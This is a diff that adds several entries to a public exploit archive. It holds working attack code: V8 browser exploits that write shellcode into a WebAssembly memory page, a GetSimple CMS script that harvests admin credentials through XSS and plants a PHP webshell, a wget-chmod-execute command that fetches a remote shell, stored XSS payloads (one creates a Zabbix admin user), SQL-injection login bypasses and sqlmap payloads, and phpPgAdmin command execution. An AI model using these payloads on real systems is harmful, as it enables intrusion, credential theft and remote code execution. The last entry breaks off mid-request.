+var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11])
+var wasm_mod = new WebAssembly.Module(wasm_code);
+var wasm_instance = new WebAssembly.Instance(wasm_mod);
+var f = wasm_instance.exports.main;
+
+var buf = new ArrayBuffer(8);
+var f64_buf = new Float64Array(buf);
+var u64_buf = new Uint32Array(buf);
+let buf2 = new ArrayBuffer(0x150);
+
+function ftoi(val) {
+    f64_buf[0] = val;
+    return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
+}
+
+function itof(val) {
+    u64_buf[0] = Number(val & 0xffffffffn);
+    u64_buf[1] = Number(val >> 32n);
+    return f64_buf[0];
+}
+
+function foo(a) {
+  var y = 0x7fffffff;
+
+  if (a == NaN) y = NaN;
+  if (a) y = -1;
+
+  let z = y + 1;
+  z >>= 31;
+  z = 0x80000000 - Math.sign(z|1);
+
+  if(a) z = 0;
+
+  var arr = new Array(0-Math.sign(z));
+  arr.shift();
+  var cor = [1.1, 1.2, 1.3];
+
+  return [arr, cor];
+}
+
+for(var i=0;i<0x3000;++i)
+    foo(true);
+
+var x = foo(false);
+var arr = x[0];
+var cor = x[1];
+
+const idx = 6;
+arr[idx+10] = 0x4242;
+
+function addrof(k) {
+    arr[idx+1] = k;
+    return ftoi(cor[0]) & 0xffffffffn;
+}
+
+function fakeobj(k) {
+    cor[0] = itof(k);
+    return arr[idx+1];
+}
+
+var float_array_map = ftoi(cor[3]);
+
+var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4];
+var fake = fakeobj(addrof(arr2) + 0x20n);
+
+function arbread(addr) {
+    if (addr % 2n == 0) {
+        addr += 1n;
+    }
+    arr2[1] = itof((2n << 32n) + addr - 8n);
+    return (fake[0]);
+}
+
+function arbwrite(addr, val) {
+    if (addr % 2n == 0) {
+        addr += 1n;
+    }
+    arr2[1] = itof((2n << 32n) + addr - 8n);
+    fake[0] = itof(BigInt(val));
+}
+
+function copy_shellcode(addr, shellcode) {
+    let dataview = new DataView(buf2);
+    let buf_addr = addrof(buf2);
+    let backing_store_addr = buf_addr + 0x14n;
+    arbwrite(backing_store_addr, addr);
+
+    for (let i = 0; i < shellcode.length; i++) {
+        dataview.setUint32(4*i, shellcode[i], true);
+    }
+}
+
+var rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + 0x68n));
+console.log("[+] Address of rwx page: " + rwx_page_addr.toString(16));
+var shellcode = [16889928,16843009,1213202689,1652108984,23227744,70338561,800606244,796029813,1349413218,1760004424,16855099,19149953,1208025345,1397310648,1497451600,3526447165,1510500946,1390543176,1222805832,16843192,16843009,3091746817,1617066286,16867949,604254536,1966061640,1647276659,827354729,141186806,3858843742,3867756630,257440618,2425393157];
+/*var shellcode = [3833809148,12642544,1363214336,1364348993,3526445142,1384859749,1384859744,1384859672,1921730592,3071232080,827148874,3224455369,2086747308,1092627458,1091422657,3991060737,1213284690,2334151307,21511234,2290125776,1207959552,1735704709,1355809096,1142442123,1226850443,1457770497,1103757128,1216885899,827184641,3224455369,3384885676,3238084877,4051034168,608961356,3510191368,1146673269,1227112587,1097256961,1145572491,1226588299,2336346113,21530628,1096303056,1515806296,1497454657,2202556993,1379999980,1096343807,2336774745,4283951378,1214119935,442,0,2374846464,257,2335291969,3590293359,2729832635,2797224278,4288527765,3296938197,2080783400,3774578698,1203438965,1785688595,2302761216,1674969050,778267745,6649957]; */ // windows shellcode
+copy_shellcode(rwx_page_addr, shellcode);
+f();
\ No newline at end of file
diff --git a/exploits/multiple/remote/49746.js b/exploits/multiple/remote/49746.js
new file mode 100644
index 000000000..1f59d0927
--- /dev/null
+++ b/exploits/multiple/remote/49746.js
@@ -0,0 +1,146 @@
+# Exploit Title: Google Chrome 81.0.4044 V8 - Remote Code Execution
+# Date: 05/04/2021
+# Exploit Author: Tobias Marcotto
+# Original Author: r4j0x00
+# Tested on: Kali Linux x64 
+# Version: 83.0.4103.106
+# Description: Out of bounds write in V8 in Google Chrome prior to 83.0.4103.106 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
+# CVE: CVE-2020-6507
+
+
+*********************************************************************************************************
+
+
+var buf = new ArrayBuffer(8);
+var f64_buf = new Float64Array(buf);
+var u64_buf = new Uint32Array(buf);
+
+var arraybuf = new ArrayBuffer(0x13373);
+var wasm_code = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 4, 1, 96, 0, 0, 3, 2, 1, 0, 7, 9, 1, 5, 115, 104, 101, 108, 108, 0, 0, 10, 4, 1, 2, 0, 11]);
+var mod = new WebAssembly.Module(wasm_code);
+var wasm_instance = new WebAssembly.Instance(mod);
+var shell = wasm_instance.exports.shell;
+var obj_array = [1337331,1337332,1337333,1337334,wasm_instance,wasm_instance,1337336,1337337];
+
+var shellcode = new Uint8Array([72, 184, 1, 1, 1, 1, 1, 1, 1, 1, 80, 72, 184, 46, 99, 104, 111, 46, 114, 105, 1, 72, 49, 4, 36, 72, 137, 231, 104, 59, 49, 1, 1, 129, 52, 36, 1, 1, 1, 1, 72, 184, 68, 73, 83, 80, 76, 65, 89, 61, 80, 49, 210, 82, 106, 8, 90, 72, 1, 226, 82, 72, 137, 226, 106, 99, 72, 184, 98, 105, 110, 47, 120, 99, 97, 108, 80, 72, 184, 1, 1, 1, 1, 1, 1, 1, 1, 80, 72, 184, 44, 98, 1, 46, 116, 114, 115, 46, 72, 49, 4, 36, 72, 184, 1, 1, 1, 1, 1, 1, 1, 1, 80, 72, 184, 46, 99, 104, 111, 46, 114, 105, 1, 72, 49, 4, 36, 49, 246, 86, 106, 19, 94, 72, 1, 230, 86, 106, 24, 94, 72, 1, 230, 86, 106, 24, 94, 72, 1, 230, 86, 72, 137, 230, 106, 59, 88, 15, 5, 0]);
+
+function ftoi(val) {
+         f64_buf[0] = val;
+         return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
+}
+function itof(val) {
+         u64_buf[0] = Number(val & 0xffffffffn);
+         u64_buf[1] = Number(val >> 32n);
+         return f64_buf[0];
+}
+
+array = Array(0x40000).fill(1.1);
+args = Array(0x100 - 1).fill(array);
+args.push(Array(0x40000 - 4).fill(2.2));
+giant_array = Array.prototype.concat.apply([], args);
+giant_array.splice(giant_array.length, 0, 3.3, 3.3, 3.3);
+
+length_as_double =
+    new Float64Array(new BigUint64Array([0x2424242400000001n]).buffer)[0];
+
+function trigger(array) {
+  var x = array.length;
+  x -= 67108861;
+  x = Math.max(x, 0);
+  x *= 6;
+  x -= 5;
+  x = Math.max(x, 0);
+
+  let corrupting_array = [0.1, 0.1];
+  let corrupted_array = [0.1];
+
+  corrupting_array[x] = length_as_double;
+  return [corrupting_array, corrupted_array];
+}
+
+for (let i = 0; i < 30000; ++i) {
+  trigger(giant_array);
+}
+
+corrupted_array = trigger(giant_array)[1];
+
+var search_space = [[(0x8040000-8)/8, 0x805b000/8], [(0x805b000)/8, (0x83c1000/8)-1], [0x8400000/8, (0x8701000/8)-1], [0x8740000/8, (0x8ac1000/8)-1], [0x8b00000/8, (0x9101000/8)-1]];
+function searchmem(value)
+{
+	skip = 0;
+	for(i=0; i<search_space.length; ++i)
+	{
+		for(j=search_space[i][0];j<search_space[i][1];++j)
+		{
+			if(((ftoi(corrupted_array[j])) >> 32n) === value || (((ftoi(corrupted_array[j])) & 0xffffffffn) === value))
+			{
+				if(skip++ == 2) // Probably the first two are due to the search itself
+					return j;
+			}
+		}
+	}
+	return -1;
+}
+
+function searchmem_full(value)
+{
+	for(i=0;i<search_space.length;++i)
+	{
+		for(j=search_space[i][0];j<search_space[i][1];++j)
+		{
+			if((ftoi(corrupted_array[j]) === value))
+			{
+				if((((ftoi(corrupted_array[j+2]) >> 56n) & 0xffn) == 8n) && (((ftoi(corrupted_array[j+2]) >> 24n) & 0xffn) == 8n))
+				{
+					return j;
+				}
+			}
+		}
+	}
+	return -1;
+}
+
+var arraybuf_idx = searchmem(0x13373n);
+if(arraybuf_idx == -1)
+{
+	alert('Failed 1');
+	throw new Error("Not found");
+}
+document.write("Found arraybuf at idx: " + arraybuf_idx + "<br>");
+function arb_read(addr, length)
+{
+	var data = [];
+	let u8_arraybuf = new Uint8Array(arraybuf);
+	corrupted_array[arraybuf_idx+1] = itof(addr);
+	for(i=0;i<length;++i)
+		data.push(u8_arraybuf[i]);
+	return data;
+}
+
+function arb_write(addr, data)
+{
+	corrupted_array[arraybuf_idx+1] = itof(addr);
+	let u8_arraybuf = new Uint8Array(arraybuf);
+	for(i=0;i<data.length;++i)
+		u8_arraybuf[i] = data[i];
+}
+
+idx = searchmem_full((1337332n << 33n) + (1337331n << 1n));
+if (idx == -1)
+{
+	alert('Failed 2');
+	throw new Error("Not found");
+}
+
+wasm_addr = ftoi(corrupted_array[idx+2]) & 0xffffffffn;
+document.write("Wasm instance: 0x"+wasm_addr.toString(16) + "<br>");
+rwx_idx = Number((wasm_addr-1n+0x68n)/8n);
+rwx_addr = ftoi(corrupted_array[rwx_idx-1]);
+if ((wasm_addr & 0xfn) == 5n || (wasm_addr & 0xfn) == 0xdn)
+{
+	rwx_addr >>= 32n;
+	rwx_addr += (ftoi(corrupted_array[rwx_idx]) & 0xffffffffn) << 32n;
+}
+document.write("rwx addr: 0x"+rwx_addr.toString(16));
+arb_write(rwx_addr, shellcode);
+shell();
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49383.py b/exploits/multiple/webapps/49383.py
index 3e689dfde..11da08305 100755
--- a/exploits/multiple/webapps/49383.py
+++ b/exploits/multiple/webapps/49383.py
@@ -32,7 +32,7 @@ PASSWORD = "password123"
 HOST_ADDR = '192.168.1.1'
 HOST_PORT = 3000
 URL = 'http://192.168.1.2:3000'                                                                                                                                                                          
-CMD = 'wget http://192.168.1.2:8080/shell -O /tmp/shell && chmod 777 /tmp/shell && /tmp/shell'                                                                                                             
+CMD = 'wget http://192.168.1.1:8080/shell -O /tmp/shell && chmod 777 /tmp/shell && /tmp/shell'                                                                                                             
                                                                                                                                                                                                              
 # Login                                                                                                                                                                                                      
 s = requests.Session()                                                                                                                                                                                       
diff --git a/exploits/multiple/webapps/49727.txt b/exploits/multiple/webapps/49727.txt
new file mode 100644
index 000000000..deb0fcf46
--- /dev/null
+++ b/exploits/multiple/webapps/49727.txt
@@ -0,0 +1,39 @@
+# Exploit Title: Openlitespeed 1.7.9 - 'Notes' Stored Cross-Site Scripting
+# Date: 3/30/2021
+# Exploit Author: cmOs
+# Vendor Homepage: https://openlitespeed.org/
+# Software Link: https://openlitespeed.org/kb/install-from-binary/
+# Version: 1.7.9
+# Tested on Ubuntu 20.04
+
+Step 1: Log in to the dashboard using the Administrator account
+Step 2: Go to Listeners > Summary > Actions (View) > Edit
+Step 3: Inject XSS_Payload to "Notes" parameter
+Step 4: Graceful Restart
+Step 5: Trigger XSS when Administrator click on Default Icon
+
+[POC]
+
+POST /view/confMgr.php HTTP/1.1
+Host: 127.0.0.1:7080
+Connection: close
+Content-Length: 163
+sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
+Accept: text/html, */*; q=0.01
+X-Requested-With: XMLHttpRequest
+sec-ch-ua-mobile: ?0
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like
+Gecko) Chrome/89.0.4389.90 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Origin: https://127.0.0.1:7080
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: https://127.0.0.1:7080/index.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: LSUI37FE0C43B84483E0=325275ee1caf0c970c4ae7960d30f0a6;
+litespeed_admin_lang=english; LSID37FE0C43B84483E0=kWLbCk%2F0XX0%3D;
+LSPA37FE0C43B84483E0=I%2Fpkx%2FeQg4s%3D
+
+name=Default&ip=ANY&port=8088&reusePort=&secure=0&note=%3Cscript%3Ealert('XSS')%3C%2Fscript%3E&a=s&m=sl_Default&p=lg&t=L_GENERAL&r=Default&tk=0.04356800+1617073257
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49731.txt b/exploits/multiple/webapps/49731.txt
new file mode 100644
index 000000000..1605f01f0
--- /dev/null
+++ b/exploits/multiple/webapps/49731.txt
@@ -0,0 +1,26 @@
+# Exploit Title: CourseMS 2.1 - 'name' Stored XSS
+# Date: 03/30/2021
+# Exploit Author: cptsticky
+# Vendor Homepage: http://sourceforge.net/projects/coursems
+# Software Link: https://sourceforge.net/projects/coursems/files/latest/download
+# Version: 2.1
+# Tested on: Ubuntu 20.04
+
+POST /coursems/admin/add_jobs.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 91
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/coursems/admin/add_jobs.php
+Cookie: PHPSESSID=9c5cgusplbmb09g86sfapoiie4; __utma=2772400.1964691305.1617119061.1617119061.1617119061.1; __utmb=2772400.87.10.1617119061; __utmc=2772400; __utmz=2772400.1617119061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
+Upgrade-Insecure-Requests: 1
+
+name=dirkgently%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&add_jobs=Add+Job+Title
+
+
+Anyone who visits the http://localhost/coursems/add_user.php will prompt execution of the stored XSS
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49733.txt b/exploits/multiple/webapps/49733.txt
new file mode 100644
index 000000000..0231811d9
--- /dev/null
+++ b/exploits/multiple/webapps/49733.txt
@@ -0,0 +1,54 @@
+# Exploit Title: Latrix 0.6.0 – 'txtaccesscode' SQL Injection
+# Date: 03/30/2021
+# Exploit Author: cptsticky
+# Vendor Homepage: https://sourceforge.net/projects/latrix
+# Software Link: https://sourceforge.net/projects/latrix/files/latest/download
+# Version: 0.6.0
+# Tested on: Ubuntu 20.04
+
+POST /latrix/inandout.php HTTP/1.1
+Host: 18.222.194.190
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 34
+Origin: http://18.222.194.190
+Connection: close
+Referer: http://18.222.194.190/latrix/inandoutcode.php?target=inandout
+Cookie: PHPSESSID=q9b6a0e050sl6jae7u64usvrs1
+Upgrade-Insecure-Requests: 1
+
+txtaccesscode=111&btnsubmit=Submit
+
+
+
+Command used to prove injection: sqlmap -r bam.txt -p txtaccesscode
+
+
+Output
+----------------snip----------------
+sqlmap resumed the following injection point(s) from stored session:
+---
+Parameter: txtaccesscode (POST)
+    Type: boolean-based blind
+    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
+    Payload: txtaccesscode=-3451' OR 7070=7070#&btnsubmit=Submit
+
+    Type: error-based
+    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
+    Payload: txtaccesscode=111' AND GTID_SUBSET(CONCAT(0x716b627a71,(SELECT (ELT(2717=2717,1))),0x71786a7071),2717)-- GnJe&btnsubmit=Submit
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: txtaccesscode=111' AND (SELECT 8547 FROM (SELECT(SLEEP(5)))qHfx)-- tljS&btnsubmit=Submit
+
+    Type: UNION query
+    Title: MySQL UNION query (NULL) - 22 columns
+    Payload: txtaccesscode=111' UNION ALL SELECT CONCAT(0x716b627a71,0x7577616c424c7a446a4c7854717a7372696c7145414e4e5a597a4e76784e616e6f48635971446b44,0x71786a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&btnsubmit=Submit
+---
+[16:29:27] [INFO] the back-end DBMS is MySQL
+web server operating system: Linux Ubuntu 20.04 or 19.10 (focal or eoan)
+web application technology: Apache 2.4.41
+back-end DBMS: MySQL >= 5.6
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49736.txt b/exploits/multiple/webapps/49736.txt
new file mode 100644
index 000000000..300d9ee2c
--- /dev/null
+++ b/exploits/multiple/webapps/49736.txt
@@ -0,0 +1,15 @@
+# Exploit Title: phpPgAdmin 7.13.0 - COPY FROM PROGRAM Command Execution (Authenticated)
+# Date: 29/03/2021
+# Exploit Author: Valerio Severini
+# Vendor Homepage: Software Link: https://github.com/phppgadmin/phppgadmin/releases/tag/REL_7-13-0
+# Version: 7.13.0 or lower
+# Tested on: Debian 10 and Ubuntu
+
+Description: phpPgAdmin through 7.13.0 allows remote authenticated users to execute arbitrary code. An attacker can create a table named cmd_exec with one column, add type=text and cmd_out, and try to execute the query via a SQL tab. It will fail because of restrictions on statements. However, the attacker can bypass this step by uploading a .txt file (containing a SQL statement such as "COPY cmd_exec FROM PROGRAM" followed by OS commands) in the Browse bar. This achieves remote command execution via a "SELECT * FROM cmd_exec" statement.
+
+Attack Vectors (PoC):
+1) you have to create a table manually and call it "cmd_exec" with 1 column
+2) add cmd_output and type = text
+3) try to execute the query via SQL tabs , but it should fail because of restriction of Statement.
+4) A malicious Attacker could bypass this step uploading a .txt file in "Browse" bar, with a SQL malicious query inside, for example: " COPY cmd_exec FROM PROGRAM 'id; cd /root; ls'; "
+5) The attacker could execute Remote command execution and obtain full access control executing in SQL query: " SELECT * FROM cmd_exec; "
\ No newline at end of file
diff --git a/exploits/php/webapps/49726.py b/exploits/php/webapps/49726.py
new file mode 100755
index 000000000..077a67b59
--- /dev/null
+++ b/exploits/php/webapps/49726.py
@@ -0,0 +1,125 @@
+# Exploit Title: GetSimple CMS 3.3.16 - Reflected XSS to RCE
+# Exploit Author: Bobby Cooke (boku)
+# Discovery Credits: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec)
+# Date: March 29th, 2021
+# CVE ID: CVE-2020-23839 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-23839
+# Vendor Homepage: http://get-simple.info
+# Software Link: http://get-simple.info/download/
+# Version: v3.3.16
+# Tested against Server Host: Windows 10 Pro + XAMPP
+# Tested against Client Browsers: Firefox(Linux), Chrome (Linux & Windows), Edge
+# Full Disclosure & Information at: https://github.com/boku7/CVE-2020-23839
+
+#  Vulnerability Description:
+#  GetSimple CMS v3.3.16 suffers from a Reflected XSS on the Admin Login Portal. On August 12th, 2020, the vendor received full disclosure details of the vulnerability via private email. The vulnerability was publicly disclosed on September 13th, 2020 #  via MITRE with the publication of CVE-2020-23839, which contained little details and no proof of concept. On January 20th, 2021 full disclosure and code analysis was publicly disclosed under the GetSimple CMS GitHub active issues ticket.
+#  Exploit Description:
+#  This exploit creates a Reflected XSS payload, in the form of a hyperlink,  which exploit CVE-2020-23839. When an Administrator of the GetSimple CMS system goes to this URL in their browser and enters their credentials, a sophisticated exploitation #  attack-chain will be launched, which will allow the remote attacker to gain Remote Code Execution of the server that hosts the GetSimple CMS system.
+#  Attack Chain:
+#  1. Attacker tricks GetSimple CMS Admin to go to the URL provided from this exploit
+#  2. Admin then enters their credentials into the GetSimple CMS login portal
+#  3. Reflected XSS Payload triggers onAction when the Admin clicks the Submit button or presses Enter
+#  4. The XSS payload performs an XHR POST request in the background, which logs the browser into the GetSimple CMS Admin panel
+#  5. The XSS payload then performs a 2nd XHR GET request to admin/edit-theme.php, and collects the CSRF Token & Configured theme for the webpages hosted on the CMS
+#  6. The XSS payload then performs a 3rd XHR POST request to admin/edit-theme.php, which injects a PHP backdoor WebShell to all pages of the CMS
+#  7. The exploit repeatedly attempts to connect to the public /index.php page of the target GetSimple CMS system until a WebShell is returned
+#  8. When the exploit hooks to the WebShell, an interactive PHP WebShell appears in the attackers console
+
+import sys,re,argparse,requests
+from urllib.parse import quote
+from colorama import (Fore as F, Back as B, Style as S)
+from time import sleep
+
+FT,FR,FG,FY,FB,FM,FC,ST,SD,SB = F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT
+def bullet(char,color):
+    C=FB if color == 'B' else FR if color == 'R' else FG 
+    return SB+FB+'['+ST+SB+char+SB+FB+']'+ST+' '
+info,err,ok = bullet('-','B'),bullet('-','R'),bullet('+','G')
+
+def webshell(SERVER_URL):
+    try:
+        WEB_SHELL = SERVER_URL
+        getdir  = {'FierceGodKick': 'echo %CD%'}
+        r = requests.post(url=WEB_SHELL, data=getdir, verify=False)
+        status = r.status_code
+        cwd = re.findall(r'[CDEF].*', r.text)
+        if cwd:
+            cwd = cwd[0]+"> "
+            term = SB+FG+cwd+FT
+            print(SD+FR+')'+FY+'+++++'+FR+'['+FT+'=========>'+ST+SB+'     WELCOME BOKU     '+ST+SD+'<========'+FR+']'+FY+'+++++'+FR+'('+FT+ST)
+            while True:
+                thought = input(term)
+                command = {'FierceGodKick': thought}
+                r = requests.post(WEB_SHELL, data=command, verify=False)
+                status = r.status_code
+                if status != 200:
+                    r.raise_for_status()
+                response = r.text
+                print(response)
+        else:
+            r.raise_for_status()
+    except:
+        pass
+
+def urlEncode(javascript):
+    return quote(javascript)
+
+def genXssPayload():
+    XSS_PAYLOAD = '/index/javascript:'
+    XSS_PAYLOAD += 'var s = decodeURIComponent("%2f");'
+    XSS_PAYLOAD += 'var h = "application"+s+"x-www-form-urlencoded";'
+    XSS_PAYLOAD += 'var e=function(i){return encodeURIComponent(i);};'
+    XSS_PAYLOAD += 'var user = document.forms[0][0].value;'
+    XSS_PAYLOAD += 'var pass = document.forms[0][1].value;'
+    XSS_PAYLOAD += 'var u1 = s+"admin"+s;'
+    XSS_PAYLOAD += 'var u2 = u1+"theme-edit.php";'
+    XSS_PAYLOAD += 'var xhr1 = new XMLHttpRequest();'
+    XSS_PAYLOAD += 'var xhr2 = new XMLHttpRequest();'
+    XSS_PAYLOAD += 'var xhr3 = new XMLHttpRequest();'
+    XSS_PAYLOAD += 'xhr1.open("POST",u1,true);'
+    XSS_PAYLOAD += 'xhr1.setRequestHeader("Content-Type", h);'
+    XSS_PAYLOAD += 'params = "userid="+user+"&pwd="+pass+"&submitted=Login";'
+    XSS_PAYLOAD += 'xhr1.onreadystatechange = function(){'
+    XSS_PAYLOAD += 'if (xhr1.readyState == 4 && xhr1.status == 200) {'
+    XSS_PAYLOAD += 'xhr2.onreadystatechange = function(){'
+    XSS_PAYLOAD += 'if (xhr2.readyState == 4 && xhr2.status == 200) {'
+    XSS_PAYLOAD += 'r=this.responseXML;'
+    XSS_PAYLOAD += 'nVal = r.querySelector("#nonce").value;'
+    XSS_PAYLOAD += 'eVal = r.forms[1][2].defaultValue;'
+    XSS_PAYLOAD += 'xhr3.open("POST",u2,true);'
+    XSS_PAYLOAD += 'xhr3.setRequestHeader("Content-Type", h);'
+    XSS_PAYLOAD += 'payload=e("<?php echo shell_exec($_REQUEST[FierceGodKick]) ?>");'
+    XSS_PAYLOAD += 'params="nonce="+nVal+"&content="+payload+"&edited_file="+eVal+"&submitsave=Save+Changes";'
+    XSS_PAYLOAD += 'xhr3.send(params);'
+    XSS_PAYLOAD += '}};'
+    XSS_PAYLOAD += 'xhr2.open("GET",u2,true);'
+    XSS_PAYLOAD += 'xhr2.responseType="document";'
+    XSS_PAYLOAD += 'xhr2.send();'
+    XSS_PAYLOAD += '}};'
+    XSS_PAYLOAD += 'xhr1.send(params);'
+    XSS_PAYLOAD += '%2f%2f'
+    return XSS_PAYLOAD
+
+def argsetup():
+    about  = SB+FT+'This exploit creates a Reflected XSS payload, in the form of a hyperlink,  which exploit CVE-2020-23839. When an Administrator of the GetSimple CMS system goes to this URL in their browser and enters their credentials, a sophisticated exploitation attack-chain will be launched, which will allow the remote attacker to gain Remote Code Execution of the server that hosts the GetSimple CMS system.'+ST
+    parser = argparse.ArgumentParser(description=about)
+    parser.add_argument('TargetSite',type=str,help='The routable domain name of the target site')
+    args = parser.parse_args()
+    return args
+
+if __name__ == "__main__":
+    print(SB+FB+'Exploit Author'+FT+': '+FB+'Bobby Cooke'+FT+FB)
+    print(SB+FR+'         CVE-2020-23839 '+FT+'|'+FR+' GetSimpleCMS v3.3.16 '+FT)
+    print(FR+'Reflected XSS '+FT+'->'+FR+' CredHarvest Payload '+FT+'->'+FR+' XHR Chaining '+FT+'->'+FR+' RCE'+ST)
+    args = argsetup()
+    RHOST = args.TargetSite
+    WEBAPP_URL = RHOST+'/admin/'
+    WEBAPP_URL = WEBAPP_URL+'index.php'
+    PAYLOAD = genXssPayload()
+    ENCODED_PAYLOAD = urlEncode(PAYLOAD)
+    print(info+FT+'Have a '+SB+FB+'GetSimpleCMS '+SB+FC+'Admin '+ST+'go to this '+SB+FM+'URL & login'+ST+', and you will get an '+SB+FR+'RCE WebShell'+ST)
+    print(SB+FB+WEBAPP_URL+ENCODED_PAYLOAD+ST)
+    sleep(1)
+    print(ok+'Waiting for Admin to login with creds, which will trigger the RCE XHR attack chain..')
+    while True:
+        sleep(1)
+        webshell(RHOST)
\ No newline at end of file
diff --git a/exploits/php/webapps/49729.txt b/exploits/php/webapps/49729.txt
new file mode 100644
index 000000000..ddfd73c08
--- /dev/null
+++ b/exploits/php/webapps/49729.txt
@@ -0,0 +1,16 @@
+# Exploit Title: Zabbix 3.4.7 - Stored XSS
+# Date: 30-03-2021
+# Exploit Author: Radmil Gazizov
+# Vendor Homepage: https://www.zabbix.com/
+# Software Link: https://www.zabbix.com/rn/rn3.4.7
+# Version: 3.4.7
+# Tested on: Linux
+
+# Reference -
+https://github.com/GloryToMoon/POC_codes/blob/main/zabbix_stored_xss_347.txt
+
+1- Go to /zabbix/zabbix.php?action=dashboard.list (anonymous login CVE-2019-17382)
+2- Create new dashboard
+3- Add a new widget => Type: Map nabigation tree
+4- Past into parameter "Name": <img src="x" onerror="var n='hck',q=jQuery;q.post('users.php',{sid:q('#sid').attr('value'),form:'Create+user',alias:n,name:n,surname:n,'user_groups[]':7,password1:n,password2:n,theme:'default',refresh:'9s',rows_per_page:9,url:'',user_type:3,add:'Add'});">
+5- Click to "Add" button
\ No newline at end of file
diff --git a/exploits/php/webapps/49740.txt b/exploits/php/webapps/49740.txt
new file mode 100644
index 000000000..024ce8cbf
--- /dev/null
+++ b/exploits/php/webapps/49740.txt
@@ -0,0 +1,38 @@
+# Exploit Title: Simple Food Website 1.0 - Authentication Bypass
+# Date: 2021-04-03
+# Exploit Author: Viren Saroha (illusion)
+# Vendor Homepage: https://www.sourcecodester.com/php/12510/simple-food-website-php.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=12510&title=Simple+Food+Website+%28CMS%29+in+PHP+with+Source+Code
+# Version: 1.0
+# Tested on: Windows 10/Kali Linux
+
+POC
+
+Step 1 -  Go to url http://localhost/food/admin/login.php
+Step 2 – Enter anything in username and password
+Step 3 – Click on Login and capture the request in burpsuite
+Step 4 – Change the username to ' or '1'='1'#
+Step 5 – Click forward and now you will be logged in as admin.
+
+
+REQUEST
+
+
+POST /food/admin/process_login.php HTTP/1.1
+Host: 192.168.132.128
+Content-Length: 76
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://192.168.132.128
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://192.168.132.128/food/admin/login.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=44189551c332ee92a95246aac0756dd3
+Connection: close
+
+username=%27+or+%271%27%3D%271%27%23&password=randomPassword&Sign+In=Sign+In
\ No newline at end of file
diff --git a/exploits/php/webapps/49741.txt b/exploits/php/webapps/49741.txt
new file mode 100644
index 000000000..8baa68bb1
--- /dev/null
+++ b/exploits/php/webapps/49741.txt
@@ -0,0 +1,36 @@
+# Exploit Title: Basic Shopping Cart 1.0 - Authentication Bypass
+# Date: 2021-04-03
+# Exploit Author:  Viren Saroha (illusion)
+# Vendor Homepage: https://www.sourcecodester.com/php/10964/basic-shopping-cartphpmysql.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=10964&title=Basic+Shopping+Cart+using+PHP%2FMySQL+with+Source+Code
+# Version: 1.0
+# Tested on: Windows 10/Kali Linux
+
+POC
+
+Step 1 -  Go to url http://localhost/EdgeSketch/index.php and Click on Admin
+Step 2 – Enter anything in username and password
+Step 3 – Click on Login and capture the request in burpsuite
+Step4 – Change the username to   ' or '1'='1'#
+Step 5 – Click forward and now you will be logged in as admin.
+
+REQUEST
+
+POST /EdgeSketch/adminlogin.php HTTP/1.1
+Host: localhost
+Content-Length: 77
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: application/x-www-form-urlencoded
